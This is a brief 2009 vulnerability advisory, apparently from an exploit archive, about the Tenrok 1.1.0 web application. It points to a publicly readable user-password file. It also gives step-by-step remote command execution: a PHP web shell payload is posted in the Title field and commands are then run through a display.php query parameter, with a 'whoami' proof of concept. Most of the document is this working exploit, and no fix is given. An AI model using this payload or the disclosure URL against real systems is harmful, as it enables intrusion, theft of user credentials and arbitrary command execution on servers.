Tenrok 1.1.0 (UDD-RCE) Multiple Remote Vulnerabilities

2009-08-05 18:32:18

#########################################################################
[+]
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#########################################################################

[+] Homepage : http://tenrok.com/

[+] Users Data Disclosure

- PoC

http://127.0.0.1/userpwd.txt

[+] Remote Command Execution

- Must be logged in.

- Go to

http://127.0.0.1/post.php

in the Title field write :

<?php system($_GET['cmd']); ?>

then go to

http://127.0.0.1/display.php?cmd=[YOUR COMMAND]

and execute your commands.

- PoC

http://127.0.0.1/display.php?cmd=whoami

#########################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.